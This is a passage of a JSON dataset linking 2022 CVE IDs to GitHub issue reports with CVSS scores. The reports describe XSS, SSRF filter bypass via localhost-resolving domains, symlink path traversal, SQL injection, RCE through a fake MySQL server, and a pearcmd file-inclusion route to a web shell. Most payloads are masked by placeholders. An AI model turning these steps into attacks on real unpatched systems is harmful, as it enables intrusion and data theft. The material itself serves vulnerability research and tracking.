        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-25758",
        "Issue_Url_old": "https://github.com/sasstools/scss-tokenizer/issues/45",
        "Issue_Url_new": "https://github.com/sasstools/scss-tokenizer/issues/45",
        "Repo_new": "sasstools/scss-tokenizer",
        "Issue_Created_At": "2022-01-12T21:11:06Z",
        "description": "CVETAG Might apply?. Dear SCSS Tokenizer Team, In scanning my node_modules for Regular Expression Denial of Service APITAG Affecting APITAG URLTAG and CVETAG URLTAG I encountered scss tokenizer with FILETAG with the same style regular expression that is cited in the CVE commit URLTAG . postcss APITAG scss tokenizer APITAG It's slightly different, and maybe worth your time to double check. I hope this helps.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25838",
        "Issue_Url_old": "https://github.com/laravel/fortify/issues/201",
        "Issue_Url_new": "https://github.com/laravel/fortify/issues/201",
        "Repo_new": "laravel/fortify",
        "Issue_Created_At": "2021-01-17T19:39:15Z",
        "description": "Current NUMBERTAG fa solution can lock users out of their accounts. Version NUMBERTAG Laravel Version NUMBERTAG PHP Version NUMBERTAG Description: The current two factor authentication solution sets NUMBERTAG fa to enabled without requiring a confirmation (via TOTP) that the authenticator app is actually set up. Steps To Reproduce: The current solution works like this NUMBERTAG APITAG , the user's APITAG is stored NUMBERTAG fa is now enabled NUMBERTAG APITAG , show QR code and ask user to scan the code with their app NUMBERTAG APITAG , show recovery codes and ask the user to save them NUMBERTAG User abandons the process before setting up their authenticator app or saving the recovery codes and is now locked out of their account . They could abandon the process because they first need to choose one of the many TOTP generators in the app store, and get side tracked, or their session times out, or they click the back button, or close their tab, or their computer crashes, ... Definitely NUMBERTAG fa must not be enabled before it is confirmed by a generated OTP. How To Fix It NUMBERTAG APITAG generates a QR code from a new two factor secret that is stored in the session NUMBERTAG APITAG , show the recovery codes to the user, ask them to save them NUMBERTAG The user is asked to set up their authenticator app with this QR code and enter a resulting TOTP code. This confirms that they have set up their authenticator (else they cannot generate a valid code), and can also (by written explanation) be used as confirmation that recovery codes were stored in a safe place NUMBERTAG APITAG , receives a new parameter: code . The code is validated using the two factor secret stored in the session NUMBERTAG If the code is valid, the two factor secret from the session is written into the user table (= enabling NUMBERTAG fa, now for real). If not, then the response indicates that the user did not enter a valid code and must re try.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-25851",
        "Issue_Url_old": "https://github.com/jpeg-js/jpeg-js/issues/105",
        "Issue_Url_new": "https://github.com/jpeg-js/jpeg-js/issues/105",
        "Repo_new": "jpeg-js/jpeg-js",
        "Issue_Created_At": "2022-06-02T07:17:55Z",
        "description": "jpeg js APITAG (infinite loop). The following input can create a infinite loop inside jpeg js causing it to never return: APITAG Based on some preliminary debugging it appears to be related to the following code: URLTAG Here APITAG and APITAG are initialized to zero, but since there are no components, the values are never modified, leading to a divide by zero error in the last two line (which set APITAG and APITAG to Infinity ). These values are later used inside the APITAG function, where the following loop condition never evaluates to false since APITAG is set to APITAG (i.e. APITAG ) at line NUMBERTAG in APITAG . URLTAG found using jsfuzz URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25854",
        "Issue_Url_old": "https://github.com/yairEO/tagify/issues/988",
        "Issue_Url_new": "https://github.com/yaireo/tagify/issues/988",
        "Repo_new": "yaireo/tagify",
        "Issue_Created_At": "2022-02-16T15:50:15Z",
        "description": "XSS in tagify's template wrapper. Prerequisites FILETAG Steps to reproduce NUMBERTAG Open the following forked Tagify's React Wrapper demo NUMBERTAG Notice line NUMBERTAG URLTAG where a APITAG variable is declared. This variable mocks data that came from an API or an input NUMBERTAG On the line NUMBERTAG URLTAG we use the APITAG variable to customize tags NUMBERTAG Once the demo app is rendered, open the APITAG tab and hover on the first input. It will fire the XSS. The following screenshot shows the XSS run on FILETAG APITAG The following screenshot shows the same XSS run in the dev build of the app. APITAG As you see, the tagify builds a new span with an attribute that was not supposed to be there.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-25856",
        "Issue_Url_old": "https://github.com/argoproj/argo-events/issues/1947",
        "Issue_Url_new": "https://github.com/argoproj/argo-events/issues/1947",
        "Repo_new": "argoproj/argo-events",
        "Issue_Created_At": "2022-05-10T17:50:38Z",
        "description": "Insecure path traversal in Git Trigger Source can lead to arbitrary file read. APITAG APITAG APITAG Severity | High | Difficulty | High Target | \u00a0 APITAG APITAG ERRORTAG No checks are made on this file at read time, which could lead an attacker to read files anywhere on the system. This could be achieved in at least three ways: Symbolic link in Git repository An attacker controls a Git repository that the victim uses in a Git Trigger Source. The attacker adds a file to the Git repository that is a symbolic link to a file containing sensitive information on the victims machine. Argo then clones the repository onto the victims machine, and the symbolic link is followed during file read on the marked line above. An attacker could now read the file containing sensitive information. Race condition An attacker who has limited access to the file system may be able to read arbitrary files by leveraging a race condition. The attacker could replace the git temp directory created by argo with a symbolic link to the directory containing the file to be read. This could be done anytime between the time it is created in (g APITAG and the file is read in the return statement of (g APITAG APITAG dir string). Malicious manifest An attacker controls a manifest for a Git Trigger Source that the victim creates. The manifest has a APITAG to a sensitive file anywhere on the victims machine, for example: CODETAG Recommendations Disallow symbolic links Check whether the file at APITAG is a symbolic link before it is is opened and read in (g APITAG Fail if it is. Sanitize APITAG This is includes checks for unsafe path patterns, such as: Check whether the string begins with \u201c/\u201d. Disallow \u201c..\u201d, \u201c\\\u201d, \u201c~\u201d in path. Other checks to ensure that only the files from the Git repository can be read",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-25876",
        "Issue_Url_old": "https://github.com/ospfranco/link-preview-js/issues/115",
        "Issue_Url_new": "https://github.com/ospfranco/link-preview-js/issues/115",
        "Repo_new": "ospfranco/link-preview-js",
        "Issue_Created_At": "2022-05-25T07:33:47Z",
        "description": "SSRF. Describe There is a way to bypass your regex to validate private & local networks. If we use FILETAG or URLTAG to link preview, we don't see it ( ERRORTAG ), but if we use a domain that resolved to APITAG we can. For example: localtest.me resolved to APITAG (localhost), i.e. If you 'curl APITAG you see your localhost. Similarly we can read any other private & local address, any port. To Reproduce Steps to reproduce NUMBERTAG Find domain that resolved to private address with reverse ip lookup or use localtest.me APITAG or devhead.net APITAG + APITAG + APITAG NUMBERTAG Write it to APITAG NUMBERTAG Done. You see your local domain. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26125",
        "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10507",
        "Issue_Url_new": "https://github.com/frrouting/frr/issues/10507",
        "Repo_new": "frrouting/frr",
        "Issue_Created_At": "2022-02-06T03:32:58Z",
        "description": "isisd: overflow bugs in unpack_tlv_router_cap. URLTAG There are a few issues in the loop above leading to overflow vulnerabilities. The loop condition is APITAG and APITAG is updated at the end of the loop APITAG NUMBERTAG APITAG ). The Issue on Loop Condition : at Line NUMBERTAG when we update APITAG , if APITAG , integer overflow will happen, leading to heap overflows in the next loop iteration. Other Issues : at Line NUMBERTAG Line NUMBERTAG Line NUMBERTAG Line NUMBERTAG and Line NUMBERTAG I think we need to use break instead of continue . Using continue will let us miss the update of the loop condition variable at Line NUMBERTAG Please check if my understanding of the code above is correct. If so, I can make a pull request to fix these issues then.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26126",
        "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10505",
        "Issue_Url_new": "https://github.com/frrouting/frr/issues/10505",
        "Repo_new": "frrouting/frr",
        "Issue_Created_At": "2022-02-05T05:11:16Z",
        "description": "isisd: misusing strdup leads to stack overflow. At Line NUMBERTAG in the code below, we call APITAG , which will further call APITAG . However, APITAG is not guaranteed to be a zero terminated string and, thus, will lead to a stack overflow in strdup . When I set APITAG to APITAG , then the bug disappears. Note that strdup should be used with a C string. In the same file, APITAG , there are NUMBERTAG places where APITAG are called on APITAG and, thus, the overflow may happen. Please check and suggest a fix. I can give a pull request then. URLTAG What follows is the output of the address sanitizer: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26128",
        "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10502",
        "Issue_Url_new": "https://github.com/frrouting/frr/issues/10502",
        "Repo_new": "frrouting/frr",
        "Issue_Created_At": "2022-02-04T18:10:06Z",
        "description": "An incorrect check on length in babeld. The check at Line NUMBERTAG is not correct. It should be APITAG because len does not include the first two bytes, i.e., APITAG and APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26129",
        "Issue_Url_old": "https://github.com/FRRouting/frr/issues/10503",
        "Issue_Url_new": "https://github.com/frrouting/frr/issues/10503",
        "Repo_new": "frrouting/frr",
        "Issue_Created_At": "2022-02-04T21:17:08Z",
        "description": "babeld: bugs in parse_hello_subtlv, parse_ihu_subtlv, and parse_update_subtlv. URLTAG Line NUMBERTAG the condition should be APITAG instead of APITAG . Otherwise, overflows will happen at NUMBERTAG Line NUMBERTAG the condition should be APITAG instead of APITAG . We need include extra two bytes, a[i] and a[i NUMBERTAG in this check.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26174",
        "Issue_Url_old": "https://github.com/beekeeper-studio/beekeeper-studio/issues/1051",
        "Issue_Url_new": "https://github.com/beekeeper-studio/beekeeper-studio/issues/1051",
        "Repo_new": "beekeeper-studio/beekeeper-studio",
        "Issue_Created_At": "2022-02-21T07:24:12Z",
        "description": "RCE Vulnerability in Beekeeper Studio. author: Gqliang MENTIONTAG Date NUMBERTAG Display fields are not filtered allowing arbitrary code to be inserted eg: FILETAG We can fake a MYSQL server so that any SQL statement executed when the user connects will execute the remote code we expect exp: FILETAG run this exp program eg : FILETAG As long as you execute any SELECT query on the program, the vulnerability will be triggered to execute arbitrary remote code. Of course it's not just that. eg: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26181",
        "Issue_Url_old": "https://github.com/dropbox/lepton/issues/154",
        "Issue_Url_new": "https://github.com/dropbox/lepton/issues/154",
        "Repo_new": "dropbox/lepton",
        "Issue_Created_At": "2022-02-21T11:00:57Z",
        "description": "Bug]A heap buffer overflow was discovered in function APITAG PATHTAG Description A heap buffer overflow was discovered in function APITAG PATHTAG The issue is being triggered in function APITAG PATHTAG Version lepton NUMBERTAG g2a NUMBERTAG b NUMBERTAG APITAG Commit) url: URLTAG Reproduce ERRORTAG POC poc file attached. ASAN Report ERRORTAG Occurrences [bitops.cc L NUMBERTAG L NUMBERTAG URLTAG References attached files URLTAG Contact me Any issue or problem plz contact with me. EMAILTAG Tweet. MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26198",
        "Issue_Url_old": "https://github.com/notable/notable/issues/1595",
        "Issue_Url_new": "https://github.com/notable/notable/issues/1595",
        "Repo_new": "notable/notable",
        "Issue_Created_At": "2022-02-22T06:54:26Z",
        "description": "RCE Vulnerability in Notable. author: APITAG MENTIONTAG Date NUMBERTAG Text editing without filtering leads to arbitrary code execution Payload\uff1a ERRORTAG eg. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26244",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/23",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/23",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2022-03-29T09:38:55Z",
        "description": "Persistent cross site scripting (XSS) in targeted towards web admin through FILETAG at via the parameter \"special\".. Add Doctor info payload to Doctor Special of Add Doctor page to target FILETAG , then use burpsuite get requests datas, change the 'special' parameter to xss payload: APITAG alert NUMBERTAG APITAG Step to exploit NUMBERTAG Navigate to FILETAG NUMBERTAG Click APITAG Doctors ', use burpsuite to insert xss payload in the \"special\" parameter NUMBERTAG Click APITAG Doctors\" FILETAG FILETAG Proof of concept APITAG APITAG alert NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-26245",
        "Issue_Url_old": "https://github.com/open-falcon/falcon-plus/issues/951",
        "Issue_Url_new": "https://github.com/open-falcon/falcon-plus/issues/951",
        "Repo_new": "open-falcon/falcon-plus",
        "Issue_Created_At": "2022-02-23T07:08:36Z",
        "description": "report sqlinjection vulnerability. sqlinjection source PATHTAG line NUMBERTAG CODETAG sqlinjection sink http param is APITAG PATHTAG line NUMBERTAG ERRORTAG // provide sqlinjection bool True page FILETAG sqlinjection bool False page FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26247",
        "Issue_Url_old": "https://github.com/xiweicheng/tms/issues/16",
        "Issue_Url_new": "https://github.com/xiweicheng/tms/issues/16",
        "Repo_new": "xiweicheng/tms",
        "Issue_Created_At": "2022-02-24T02:13:47Z",
        "description": "There is a Insecure Permissions vulnerability exists in tms. FILETAG NUMBERTAG In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password NUMBERTAG FILETAG Now I log in to the test account to try to change the information and password of the admin account. APITAG the user icon in the upper right corner and select Modify in the drop down box to open the modify personal information pop up window. FILETAG FILETAG APITAG there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change NUMBERTAG in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent > click the confirm submit button. FILETAG APITAG the packet capture data, as shown in the following figure. FILETAG APITAG forwad to finish the modification. FILETAG The information of viewing admin has APITAG recurrence completed. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-26255",
        "Issue_Url_old": "https://github.com/Fndroid/clash_for_windows_pkg/issues/2710",
        "Issue_Url_new": "https://github.com/fndroid/clash_for_windows_pkg/issues/2710",
        "Repo_new": "fndroid/clash_for_windows_pkg",
        "Issue_Created_At": "2022-02-23T14:53:55Z",
        "description": "APITAG Remote Code Execution NUMBERTAG Windows NUMBERTAG Windows NUMBERTAG APITAG I found a vulnerability in the clash_for_windows_pkg client that only needs a link to exploit \u590d\u73b0\u6b65\u9aa4 \u8fd9\u4e2a\u6f0f\u6d1e\u5371\u5bb3\u5f88\u5927\uff0c\u4e14\u6781\u5176\u5bb9\u6613\u5229\u7528\uff0c\u6211\u4e0d\u60f3\u5728\u4ed6\u88ab\u4fee\u590d\u4e4b\u524d\u516c\u5f00 This vulnerability is harmful and easy to exploit, I don't want to make it public until it is fixed",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26260",
        "Issue_Url_old": "https://github.com/wollardj/simple-plist/issues/60",
        "Issue_Url_new": "https://github.com/wollardj/simple-plist/issues/60",
        "Repo_new": "wollardj/simple-plist",
        "Issue_Created_At": "2022-02-23T19:46:47Z",
        "description": "Prototype Pollution using APITAG Hi, There's a prototype pollution vulnerability in APITAG related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter. ERRORTAG More information about the vulnerability: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26268",
        "Issue_Url_old": "https://github.com/hiliqi/xiaohuanxiong/issues/33",
        "Issue_Url_new": "https://github.com/hiliqi/xiaohuanxiong/issues/33",
        "Repo_new": "hiliqi/xiaohuanxiong",
        "Issue_Created_At": "2022-02-11T02:54:01Z",
        "description": "\u6f2b\u753bcms\u524d\u53f0\u5b58\u5728sql\u6ce8\u5165. FILETAG \u6f2b\u753b\u8be6\u60c5\u63a5\u53e3\u7684id\u53c2\u6570\u5b58\u5728sql\u6ce8\u5165 PATHTAG \u8fd9\u91cc\u83b7\u53d6\u53c2\u6570\u662fid FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26271",
        "Issue_Url_old": "https://github.com/N1ce759/74cmsSE-Arbitrary-File-Reading/issues/1",
        "Issue_Url_new": "https://github.com/n1ce759/74cmsse-arbitrary-file-reading/issues/1",
        "Repo_new": "n1ce759/74cmsse-arbitrary-file-reading",
        "Issue_Created_At": "2022-02-24T08:36:32Z",
        "description": "APITAG Arbitrary File Read Vulnerability. Vulnerability Name: Arbitrary File Read Date of Discovery: PATHTAG Product version\uff1a APITAG APITAG : FILETAG Author: N1ce Vulnerability Description: The function is not verified or fails to be verified. The user can control the variable to read any file Code Analysis In PATHTAG , at line NUMBERTAG there is a file manipulation function where the $url is a parameter that the user can control and is not filtered, and $ourput_filename is the filename to be output FILETAG From this, we can build parameters: PATHTAG Prove Read the web site database configuration file. PS: I used FILETAG because I didn't configure Apache pseudo static FILETAG FILETAG Reading server files FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26272",
        "Issue_Url_old": "https://github.com/ionize/ionize/issues/403",
        "Issue_Url_new": "https://github.com/ionize/ionize/issues/403",
        "Repo_new": "ionize/ionize",
        "Issue_Created_At": "2022-02-24T09:07:23Z",
        "description": "RCE exists in Ionize NUMBERTAG PATHTAG file L NUMBERTAG The APITAG Key\" parameter of the installation page uri PATHTAG is not strictly filtered, and any string can be written to the PATHTAG file, resulting in arbitrary code execution. Vulnerability reason write configuration file directly without filtering Where the vulnerability occurs: URLTAG FILETAG Vulnerability Demo When installing to user settings, the value of the Encryption Key will be written to the configuration file PATHTAG FILETAG payload: APITAG Enter payload to submit FILETAG Ok, the payload has been successfully written into FILETAG try command execution FILETAG Bugfix Only letters and numbers are allowed, no other characters are allowed",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26276",
        "Issue_Url_old": "https://github.com/helloxz/onenav/issues/44",
        "Issue_Url_new": "https://github.com/helloxz/onenav/issues/44",
        "Repo_new": "helloxz/onenav",
        "Issue_Created_At": "2022-02-25T06:00:26Z",
        "description": "APITAG has directory traversal with file inclusion that can lead to Getshell. \u6f0f\u6d1e\u7b80\u4ecb Vulnerability Introduction \u7531\u4e8e FILETAG APITAG \u6f0f\u6d1e\u5206\u6790 Vulnerability analysis \u5b58\u5728\u6f0f\u6d1e\u4ee3\u7801\uff1a Vulnerable codes\uff1a FILETAG CODETAG APITAG APITAG \uff0c\u7136\u540e\u62fc\u63a5\u540e\u8fdb\u884c\u6587\u4ef6\u5305\u542b\u3002 As shown below, the user controllable and unfiltered parameter APITAG exists in APITAG which is then spliced for file inclusion. FILETAG \u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5f62\u5982 APITAG \u6765\u5229\u7528php\u539f\u751f\u7684 APITAG \u6587\u4ef6\u4e0b\u8f7d\u6076\u610f\u6587\u4ef6\u3002 APITAG We can use a payload shaped like xxx to download malicious files using the php native APITAG file. FILETAG content: (if you have a php environment, use echo output, if you don't have a php environment, the content is just malicious code) APITAG APITAG The request will download the php file containing the malicious code within the server and output the path, and then use the path to traverse the path containing the malicious file to Getshell. \u6f0f\u6d1e\u590d\u73b0 Vulnerability Reproduction APITAG APITAG APITAG \uff0c\u8fd9\u4e2a\u76ee\u5f55\u4e0b\u5c31\u6709\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u7684 APITAG \u3002 \u6211\u4eec\u5f00\u542f\u4e00\u4e2a APITAG \u5b98\u65b9docker\u955c\u50cf\u641c\u7d22\uff0c\u53ef\u4ee5\u770b\u5230 APITAG \u6240\u5728\u4f4d\u7f6e\uff1a The complete environment of php will contain pecl, which is a command line tool used in PHP to manage extensions, and pear, which is a class library that pecl depends on. In any version of the Docker image, pcel/pear is installed by default in APITAG , and this directory contains APITAG , which we can use. We open a APITAG official docker image to search for it, and we can see where APITAG is located. FILETAG \u4f7f\u7528\u5b9d\u5854\uff08 FILETAG \uff09\u642d\u5efa\u7f51\u7ad9\u4e5f\u4f1a\u5b58\u5728\uff1a Building a website using Baota ( FILETAG can also present. FILETAG Mac\u73af\u5883\u4e0b\u4f7f\u7528MAMP\u5efa\u7ad9\u4e5f\u4f1a\u542b\u6709 APITAG \u6587\u4ef6\uff1a A Mac environment built with MAMP will also contain the APITAG file. FILETAG \u8fd9\u91cc\u6211\u4f7f\u7528\u5b98\u65b9docker APITAG \u505a\u6f14\u793a\uff0c Dockerfile \u4e0b\u8f7d\u5730\u5740\uff1a URLTAG \u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8def\u5f84\u7a7f\u8d8a\u5305\u542b APITAG \uff0c\u4f20\u5165\u4e0b\u8f7d\u6587\u4ef6\u7684payload\uff0c\u4e0b\u8f7d\u6076\u610f\u6587\u4ef6\u5230\u670d\u52a1\u5668\u3002 Here I use the official docker APITAG for a demo, Dockerfile download address: URLTAG So we can download the malicious file to the server by path traversal containing APITAG and passing in the payload of the downloaded file. APITAG FILETAG APITAG Then go ahead and include the malicious files to Getshell. APITAG FILETAG \u5176\u4ed6 \u5173\u4e8e APITAG \u7684\u8be6\u7ec6\u5229\u7528\u63cf\u8ff0\u53ef\u4ee5\u53c2\u8003p\u725b\u7684\u6587\u7ae0\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26279",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/22",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/22",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2022-02-25T02:20:46Z",
        "description": "Database backup Download . Author: A NUMBERTAG Submit date: PATHTAG Target: FILETAG APITAG NUMBERTAG UTF8 SP NUMBERTAG FILETAG APITAG /data/sqldata directory has no access restrictions. You can download it by building an absolute path, in which NUMBERTAG SQL) (yyyy / DD / h / min / S backup times version. SQL) constructs batch fuzzy tests through scripts APITAG Background backup FILETAG Path FILETAG APITAG Batch fuzz test through script",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-26280",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1672",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1672",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2022-02-25T08:52:19Z",
        "description": "The libarchive lib exist a READ memory access Vulnerability. hello,when i write code to call archive_read_data function,i find a READ memory access Vulnerability.see the picture! FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 4.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-26291",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/206",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/206",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2021-08-02T11:46:06Z",
        "description": "Multiple concurrency UAF bug between APITAG and APITAG function. Dear all, Our tool report that there would be multiple concurrency use after free between APITAG function and APITAG function, in the newest master branch NUMBERTAG afe8. Brief Explanation The related code simplified from APITAG and ERRORTAG are shown as follow: ERRORTAG Both thread T0 and thread T1 operate on a shared variable ucthread (i.e., T0 dealloc the a ucthread through APITAG , and T1 use the ucthread in all statements ERRORTAG , APITAG , and APITAG ). However, a use after free can occur if the deallocation of ucthread before the use of ucthread. For example, the following three thread interleaving can trigger three different UAFs: Interleaving (a) ERRORTAG Interleaving (b) ERRORTAG Interleaving (c) ERRORTAG Reproduce through delay injection To reproduce those use after free errors, we can insert two delays (e.g., APITAG ) into the original source code. For example, to reproduce interleaving (a) as mentioned earlier, you can insert a delay before APITAG statement in function in APITAG , and also a delay after, as shown as follows. ERRORTAG FILETAG compile the program: APITAG Download the testcase (I upload the POC here, please unzip first). FILETAG Run with the testcase with the following command: APITAG Then, you will see the use after free bug report. Here is the trace reported by ASAN: ERRORTAG I'm not sure if these use after free bugs could cause serious harm. I hope you can check whether it is necessary to fix these bugs. Thanks.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26296",
        "Issue_Url_old": "https://github.com/riscv-boom/riscv-boom/issues/577",
        "Issue_Url_new": "https://github.com/riscv-boom/riscv-boom/issues/577",
        "Repo_new": "riscv-boom/riscv-boom",
        "Issue_Created_At": "2021-11-09T00:36:07Z",
        "description": "New transient execution attack on Boom.. APITAG Type of issue : bug report APITAG APITAG Impact : rtl refactoring APITAG Development Phase : proposal Hi, I found a new transient execution attack on risc v boom. The attack relies on the bug NUMBERTAG which is a performance bug originally. But the same bug can also be used to transiently poison the BIM table using a transiently accessed secret. The attached APITAG attack is a Meltdown type of attack where a supervisor mode software transiently leaks a secret from the machine mode software (i.e., either a firmware or an enclave). The attack is based on two vulnerabilities NUMBERTAG boom transiently executes load instruction before checking PMP violation , and NUMBERTAG BIM table can be transiently updated using the accessed value . The attack is quite slow than using D cache as a side channel, but it still works and almost correctly retrieves the secret value (i.e NUMBERTAG deadbeef ). Used boom commit: d NUMBERTAG c2c3f How to reproduce the attack: APITAG This can be mitigated by fixing either one of two bugs above. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-26301",
